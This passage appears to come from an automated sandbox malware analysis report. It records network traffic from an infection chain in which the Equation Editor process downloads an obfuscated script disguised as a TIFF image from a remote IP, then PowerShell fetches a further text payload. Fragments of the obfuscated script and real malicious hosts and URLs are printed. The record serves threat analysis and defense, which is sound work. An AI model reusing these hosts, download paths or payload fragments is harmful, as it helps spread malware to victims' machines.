                                                    Aug 31, 2024 19:25:33.699569941 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.699579954 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.699590921 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.699598074 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.699601889 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.699614048 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.699625969 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.699651957 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.700268030 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.700277090 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.700287104 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.700298071 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.700308084 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.700313091 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.700319052 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.700330019 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.700340033 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.700347900 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.700370073 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.701005936 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.701016903 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.701028109 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.701039076 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.701050043 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.701055050 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.701066971 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.701061964 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.701080084 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.701101065 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.701742887 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.701756001 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.701766968 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.701777935 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.701788902 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.701792955 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.701798916 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.701809883 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.701811075 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.701821089 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.701832056 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.701857090 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.702563047 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.702574968 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.702615976 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.702764988 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.702775002 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.702785015 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.702795982 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.702806950 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.702811003 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.702847958 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.703166008 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.703176022 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.703186989 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.703197956 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.703203917 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.703210115 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.703232050 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.703676939 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.703687906 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.703697920 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.703712940 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.703718901 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.703723907 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.703735113 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.703743935 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.703746080 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.703768015 CEST4916680192.168.2.22185.251.91.119
                                                    Aug 31, 2024 19:25:33.704132080 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.704143047 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.704154015 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.704164028 CEST8049166185.251.91.119192.168.2.22
                                                    Aug 31, 2024 19:25:33.704174995 CEST8049166185.251.91.119192.168.2.22
Aug 31, 2024 19:25:33.704174995 CEST | 49166 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:33.704185963 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.704196930 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.704199076 CEST | 49166 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:33.704207897 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.704217911 CEST | 49166 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:33.704252958 CEST | 49166 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:33.704756975 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.704766989 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.704777956 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.704788923 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.704799891 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.704801083 CEST | 49166 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:33.704827070 CEST | 49166 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:33.705111027 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.705153942 CEST | 49166 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:33.705171108 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.705183029 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.705193996 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.705204964 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.705215931 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.705228090 CEST | 49166 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:33.705250978 CEST | 49166 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:33.705614090 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.712351084 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.712416887 CEST | 49166 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:33.712435007 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.712446928 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.712479115 CEST | 49166 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:33.712532043 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.712543011 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.712553978 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.712564945 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.712577105 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.712580919 CEST | 49166 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:33.712604046 CEST | 49166 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:33.712867022 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.712878942 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.712908030 CEST | 49166 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:33.926223993 CEST | 80 | 49166 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:33.926276922 CEST | 49166 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:39.888622999 CEST | 49167 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:39.893573046 CEST | 80 | 49167 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:39.893639088 CEST | 49167 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:39.893795967 CEST | 49167 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:39.893848896 CEST | 49167 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:39.898896933 CEST | 80 | 49167 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:39.898905993 CEST | 80 | 49167 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:39.898909092 CEST | 80 | 49167 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:40.927783012 CEST | 80 | 49167 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:25:41.127630949 CEST | 49167 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:25:41.785916090 CEST | 49167 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:26:33.747134924 CEST | 49166 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:26:52.618242025 CEST | 49168 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:26:52.623502970 CEST | 80 | 49168 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:26:52.623574018 CEST | 49168 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:26:52.623749971 CEST | 49168 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:26:52.623781919 CEST | 49168 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:26:52.628583908 CEST | 80 | 49168 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:26:52.629057884 CEST | 80 | 49168 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:26:53.625802994 CEST | 80 | 49168 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:26:53.834259033 CEST | 80 | 49168 | 185.251.91.119 | 192.168.2.22
Aug 31, 2024 19:26:53.834307909 CEST | 49168 | 80 | 192.168.2.22 | 185.251.91.119
Aug 31, 2024 19:27:05.677818060 CEST | 49168 | 80 | 192.168.2.22 | 185.251.91.119
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 31, 2024 19:25:06.348325968 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 19:25:06.359579086 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 19:25:31.697573900 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 19:25:31.964854002 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 19:25:31.970921040 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 19:25:32.069288969 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 19:25:38.667424917 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 19:25:39.677067995 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 19:25:39.864599943 CEST | 53 | 57893 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 19:25:39.880815983 CEST | 54821 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 19:25:39.888066053 CEST | 53 | 54821 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 19:25:40.226501942 CEST | 53 | 57893 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 19:26:51.907284021 CEST | 54719 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 19:26:51.914275885 CEST | 53 | 54719 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 19:26:52.037043095 CEST | 49881 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 19:26:52.270508051 CEST | 53 | 49881 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 19:26:52.271166086 CEST | 49881 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 19:26:52.549982071 CEST | 53 | 49881 | 8.8.8.8 | 192.168.2.22
Aug 31, 2024 19:26:52.550226927 CEST | 49881 | 53 | 192.168.2.22 | 8.8.8.8
Aug 31, 2024 19:26:52.567785025 CEST | 53 | 49881 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Aug 31, 2024 19:25:40.226615906 CEST | 192.168.2.22 | 8.8.8.8 | d012 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 31, 2024 19:25:06.348325968 CEST | 192.168.2.22 | 8.8.8.8 | 0xc44c | Standard query (0) | ia803104.us.archive.org | A (IP address) | IN (0x0001) | false
Aug 31, 2024 19:25:31.697573900 CEST | 192.168.2.22 | 8.8.8.8 | 0xa59f | Standard query (0) | prolinice.ga | A (IP address) | IN (0x0001) | false
Aug 31, 2024 19:25:31.970921040 CEST | 192.168.2.22 | 8.8.8.8 | 0x575c | Standard query (0) | prolinice.ga | A (IP address) | IN (0x0001) | false
Aug 31, 2024 19:25:38.667424917 CEST | 192.168.2.22 | 8.8.8.8 | 0xe944 | Standard query (0) | prolinice.ga | A (IP address) | IN (0x0001) | false
Aug 31, 2024 19:25:39.677067995 CEST | 192.168.2.22 | 8.8.8.8 | 0xe944 | Standard query (0) | prolinice.ga | A (IP address) | IN (0x0001) | false
Aug 31, 2024 19:25:39.880815983 CEST | 192.168.2.22 | 8.8.8.8 | 0xcee6 | Standard query (0) | prolinice.ga | A (IP address) | IN (0x0001) | false
Aug 31, 2024 19:26:51.907284021 CEST | 192.168.2.22 | 8.8.8.8 | 0xebec | Standard query (0) | prolinice.ga | A (IP address) | IN (0x0001) | false
Aug 31, 2024 19:26:52.037043095 CEST | 192.168.2.22 | 8.8.8.8 | 0x15a2 | Standard query (0) | prolinice.ga | A (IP address) | IN (0x0001) | false
Aug 31, 2024 19:26:52.271166086 CEST | 192.168.2.22 | 8.8.8.8 | 0x15a2 | Standard query (0) | prolinice.ga | A (IP address) | IN (0x0001) | false
Aug 31, 2024 19:26:52.550226927 CEST | 192.168.2.22 | 8.8.8.8 | 0x15a2 | Standard query (0) | prolinice.ga | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 31, 2024 19:25:06.359579086 CEST | 8.8.8.8 | 192.168.2.22 | 0xc44c | No error (0) | ia803104.us.archive.org | | 207.241.232.154 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 19:25:31.964854002 CEST | 8.8.8.8 | 192.168.2.22 | 0xa59f | No error (0) | prolinice.ga | | 185.251.91.119 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 19:25:32.069288969 CEST | 8.8.8.8 | 192.168.2.22 | 0x575c | No error (0) | prolinice.ga | | 185.251.91.119 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 19:25:39.864599943 CEST | 8.8.8.8 | 192.168.2.22 | 0xe944 | No error (0) | prolinice.ga | | 185.251.91.119 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 19:25:39.888066053 CEST | 8.8.8.8 | 192.168.2.22 | 0xcee6 | No error (0) | prolinice.ga | | 185.251.91.119 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 19:25:40.226501942 CEST | 8.8.8.8 | 192.168.2.22 | 0xe944 | No error (0) | prolinice.ga | | 185.251.91.119 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 19:26:51.914275885 CEST | 8.8.8.8 | 192.168.2.22 | 0xebec | No error (0) | prolinice.ga | | 185.251.91.119 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 19:26:52.270508051 CEST | 8.8.8.8 | 192.168.2.22 | 0x15a2 | No error (0) | prolinice.ga | | 185.251.91.119 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 19:26:52.549982071 CEST | 8.8.8.8 | 192.168.2.22 | 0x15a2 | No error (0) | prolinice.ga | | 185.251.91.119 | A (IP address) | IN (0x0001) | false
Aug 31, 2024 19:26:52.567785025 CEST | 8.8.8.8 | 192.168.2.22 | 0x15a2 | No error (0) | prolinice.ga | | 185.251.91.119 | A (IP address) | IN (0x0001) | false
• ia803104.us.archive.org
• 23.94.148.16
• cpbrvhywlnsy.com
• prolinice.ga
• wehtwifahcxeheu.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49163 | 23.94.148.16 | 80 | 3312 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | Bytes transferred | Direction | Data
Aug 31, 2024 19:25:01.742921114 CEST | 336 | OUT | GET /90/verynicebuttersmoothcakeicream.tIF HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 23.94.148.16
Connection: Keep-Alive
Aug 31, 2024 19:25:02.423346996 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Sat, 31 Aug 2024 17:25:01 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Fri, 30 Aug 2024 01:22:53 GMT
ETag: "2cb2c-620dc6e2b6890"
Accept-Ranges: bytes
Content-Length: 183084
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff
                                                    Data Raw: ff fe 0d 00 0a 00 61 00 4f 00 4c 00 68 00 4b 00 66 00 4c 00 71 00 4a 00 55 00 20 00 3d 00 20 00 22 00 5a 00 6e 00 66 00 4c 00 57 00 6d 00 43 00 63 00 47 00 6e 00 22 00 0d 00 0a 00 55 00 7a 00 70 00 75 00 4c 00 4e 00 4e 00 66 00 4b 00 6b 00 20 00 3d 00 20 00 22 00 4f 00 65 00 68 00 41 00 51 00 57 00 55 00 78 00 4c 00 4c 00 22 00 0d 00 0a 00 4c 00 63 00 67 00 4f 00 47 00 4b 00 6d 00 4b 00 63 00 4c 00 20 00 3d 00 20 00 22 00 48 00 62 00 4c 00 6b 00 4c 00 74 00 4c 00 57 00 63 00 51 00 22 00 0d 00 0a 00 76 00 63 00 55 00 73 00 66 00 6c 00 5a 00 52 00 6c 00 43 00 20 00 3d 00 20 00 22 00 6d 00 4c 00 75 00 62 00 53 00 54 00 6b 00 4b 00 57 00 68 00 22 00 0d 00 0a 00 6b 00 4f 00 47 00 47 00 4a 00 41 00 6c 00 55 00 65 00 66 00 20 00 3d 00 20 00 22 00 5a 00 52 00 66 00 4b 00 7a 00 57 00 4c 00 5a 00 4a 00 62 00 22 00 0d 00 0a 00 55 00 7a 00 47 00 4f 00 68 00 62 00 69 00 57 00 57 00 55 00 20 00 3d 00 20 00 22 00 5a 00 68 00 69 00 4b 00 4a 00 4c 00 47 00 63 00 78 00 4c 00 22 00 0d 00 0a 00 52 00 4e 00 57 00 57 00 [TRUNCATED]
                                                    Data Ascii: aOLhKfLqJU = "ZnfLWmCcGn"UzpuLNNfKk = "OehAQWUxLL"LcgOGKmKcL = "HbLkLtLWcQ"vcUsflZRlC = "mLubSTkKWh"kOGGJAlUef = "ZRfKzWLZJb"UzGOhbiWWU = "ZhiKJLGcxL"RNWWPcWLpk = "inLcRaLORT"LJRHpWOLiA = "HANiCKKaoW"LlixubWiPa = "eCPxbZkAQc"caWilmiUZo = "PObfcPWtmW"pbnQmpoiKu = "QkZAvlIxcJ"PqiGNOkWuS = "uNUKciGpdh"UgnILezUit = "IWGcLuhWHk"oakCeoALzi = "PWZZKmAOlf"CNiPKnohse = "NGUqLdizGW"PcKPTWkeQL = "shNHbzkWTW"LNGLtAHidG = "khUhJAiZPW
Aug 31, 2024 19:25:02.423366070 CEST | 1236 | IN | Data Raw: 00 22 00 0d 00 0a 00 0d 00 0a 00 50 00 63 00 5a 00 57 00 68 00 61 00 55 00 61 00 51 00 73 00 20 00 3d 00 20 00 22 00 63 00 63 00 76 00 47 00 47 00 6b 00 48 00 47 00 54 00 66 00 22 00 0d 00 0a 00 7a 00 7a 00 6b 00 50 00 78 00 4c 00 4b 00 4e 00 47
                                                    Data Ascii: "PcZWhaUaQs = "ccvGGkHGTf"zzkPxLKNGC = "SUNZkCApGd"mUNkAGmWGa = "kitbcKLGKi"hUzaUBiiqN = "WahkeKItqC"kWenPSkG
Aug 31, 2024 19:25:02.423372984 CEST | 1236 | IN | Data Raw: 00 57 00 69 00 6b 00 69 00 41 00 70 00 62 00 63 00 6f 00 20 00 3d 00 20 00 22 00 69 00 6d 00 71 00 74 00 57 00 71 00 6b 00 6d 00 65 00 69 00 22 00 0d 00 0a 00 47 00 4a 00 65 00 66 00 63 00 67 00 4c 00 70 00 6b 00 57 00 20 00 3d 00 20 00 22 00 4c
                                                    Data Ascii: WikiApbco = "imqtWqkmei"GJefcgLpkW = "LmCnuhLqRq"eZKNsGLPNl = "fxhcLrkpAL"snPmZvWWSG = "xBrqGBbUAi"KzPWLLkiOo = "
Aug 31, 2024 19:25:02.423536062 CEST | 672 | IN | Data Raw: 00 57 00 75 00 57 00 22 00 0d 00 0a 00 51 00 6f 00 6c 00 57 00 50 00 5a 00 53 00 7a 00 6e 00 5a 00 20 00 3d 00 20 00 22 00 4c 00 75 00 47 00 4c 00 6d 00 47 00 69 00 6f 00 69 00 71 00 22 00 0d 00 0a 00 6d 00 65 00 5a 00 63 00 6c 00 41 00 74 00 78
                                                    Data Ascii: WuW"QolWPZSznZ = "LuGLmGioiq"meZclAtxgP = "ixfhdWNGWf"WPcAxtpLoT = "KobKveqcWv"cWfHpZiKLm = "cWbLiuZLiZ"xaOmBAo
Aug 31, 2024 19:25:02.423567057 CEST | 1236 | IN | Data Raw: 00 55 00 71 00 74 00 69 00 50 00 7a 00 20 00 3d 00 20 00 22 00 50 00 41 00 57 00 69 00 78 00 6b 00 55 00 5a 00 71 00 4c 00 22 00 0d 00 0a 00 6f 00 74 00 68 00 4c 00 47 00 6f 00 61 00 4c 00 4f 00 74 00 20 00 3d 00 20 00 22 00 47 00 4e 00 55 00 54
                                                    Data Ascii: UqtiPz = "PAWixkUZqL"othLGoaLOt = "GNUTJWZmWi"gPGvnsKLhk = "GPKUWLGAjL"hGpgxKJoOi = "iUfqKKPirL"JnbhlCdIPn = "h
Aug 31, 2024 19:25:02.423577070 CEST | 1236 | IN | Data Raw: 00 22 00 0d 00 0a 00 0d 00 0a 00 63 00 65 00 57 00 57 00 41 00 50 00 4c 00 78 00 49 00 6d 00 20 00 3d 00 20 00 22 00 43 00 66 00 57 00 55 00 78 00 4c 00 57 00 7a 00 4e 00 6e 00 22 00 0d 00 0a 00 63 00 61 00 41 00 55 00 69 00 67 00 5a 00 69 00 6f
                                                    Data Ascii: "ceWWAPLxIm = "CfWUxLWzNn"caAUigZioK = "rUkmGinhuG"RcUiKeZiNA = "JkUmhpmbhi"LbcHkLeKip = "iWGORZbKuz"UeKeCbNC
Aug 31, 2024 19:25:02.423588991 CEST | 1236 | IN | Data Raw: 00 6d 00 6f 00 65 00 69 00 72 00 61 00 70 00 4c 00 4c 00 68 00 6b 00 74 00 75 00 41 00 22 00 0d 00 0a 00 6d 00 4b 00 6f 00 4b 00 67 00 49 00 47 00 63 00 4c 00 68 00 20 00 3d 00 20 00 22 00 57 00 68 00 52 00 41 00 4a 00 4c 00 42 00 71 00 4b 00 4b
                                                    Data Ascii: moeirapLLhktuA"mKoKgIGcLh = "WhRAJLBqKK"WRCppGGmQi = "kfiJqimKZq"WZlBCPoAKC = "xrRWWnTNiW"GIcomWLKGW = "iSuKGOOKe
Aug 31, 2024 19:25:02.423602104 CEST | 1236 | IN | Data Raw: 00 6f 00 6f 00 68 00 69 00 57 00 70 00 6e 00 74 00 22 00 0d 00 0a 00 55 00 70 00 6e 00 69 00 47 00 75 00 61 00 78 00 73 00 72 00 20 00 3d 00 20 00 22 00 57 00 51 00 4a 00 4c 00 55 00 48 00 43 00 4e 00 5a 00 69 00 22 00 0d 00 0a 00 43 00 6e 00 65
                                                    Data Ascii: oohiWpnt"UpniGuaxsr = "WQJLUHCNZi"CnefPdRpAA = "LupNZRiWKh"WmiBnTsKLN = "mBmLxqBcWk"LLgBAKLLpi = "zfGquUkLek"dJ
Aug 31, 2024 19:25:02.423787117 CEST | 1236 | IN | Data Raw: 00 57 00 66 00 22 00 0d 00 0a 00 55 00 62 00 6e 00 66 00 78 00 74 00 4c 00 65 00 6d 00 4c 00 20 00 3d 00 20 00 22 00 4b 00 63 00 6d 00 68 00 41 00 66 00 41 00 4c 00 6b 00 54 00 22 00 0d 00 0a 00 4c 00 62 00 4c 00 55 00 43 00 63 00 4b 00 72 00 52
                                                    Data Ascii: Wf"UbnfxtLemL = "KcmhAfALkT"LbLUCcKrRe = "icOkzaLlQf"jZiUOWCtBo = "HPxmrAZGue"INepCsiARN = "KfkNookjRO"UHRecU
Aug 31, 2024 19:25:02.423799038 CEST | 1236 | IN | Data Raw: 00 54 00 57 00 7a 00 7a 00 6d 00 67 00 66 00 6c 00 49 00 22 00 0d 00 0a 00 0d 00 0a 00 63 00 74 00 4c 00 78 00 57 00 6e 00 74 00 57 00 68 00 6e 00 20 00 3d 00 20 00 22 00 47 00 41 00 66 00 63 00 75 00 57 00 4e 00 62 00 65 00 57 00 22 00 0d 00 0a
                                                    Data Ascii: TWzzmgflI"ctLxWntWhn = "GAfcuWNbeW"dUAlnmpLmk = "fGicWiWfAG"ZbfetKOanL = "iKfLTqcxzz"iZKkLWudoL = "koCWiZGLPk"
Aug 31, 2024 19:25:02.423871040 CEST | 1236 | IN | Data Raw: 00 6d 00 4c 00 43 00 78 00 65 00 22 00 0d 00 0a 00 66 00 4e 00 5a 00 61 00 74 00 68 00 4c 00 7a 00 6d 00 48 00 20 00 3d 00 20 00 22 00 6b 00 47 00 78 00 69 00 4f 00 53 00 4c 00 63 00 70 00 6e 00 22 00 0d 00 0a 00 41 00 4b 00 6a 00 47 00 70 00 57
                                                    Data Ascii: mLCxe"fNZathLzmH = "kGxiOSLcpn"AKjGpWiZLd = "pdLqqhWNAW"eReWixnzGp = "buNbeNkeLL"KckWLaifhk = "SlLWLzjxLL"pnLLj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49165 | 23.94.148.16 | 80 | 3628 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Aug 31, 2024 19:25:08.947418928 CEST | 73 | OUT | GET /90/WEFV.txt HTTP/1.1
Host: 23.94.148.16
Connection: Keep-Alive
